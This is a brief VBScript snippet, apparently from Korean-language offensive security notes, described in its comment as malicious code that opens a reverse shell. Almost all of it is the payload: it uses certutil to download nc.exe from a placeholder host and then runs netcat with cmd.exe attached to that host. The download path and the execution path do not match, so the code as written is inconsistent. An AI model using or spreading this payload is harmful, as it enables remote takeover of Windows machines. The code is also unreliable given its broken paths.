vbs
# VBS를 실행 시 리버스 쉘을 연결하도록 하는 악성 코드
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c mkdir C:\Windows\Temp"
oShell.run "cmd.exe /c certutil -urlcache -f http://<IP>/nc.exe C:\Windows\Temp\nc.exe"
oShell.run "cmd.exe /c C:\Temp\nc.exe <IP> -e cmd.exe"References
Last updated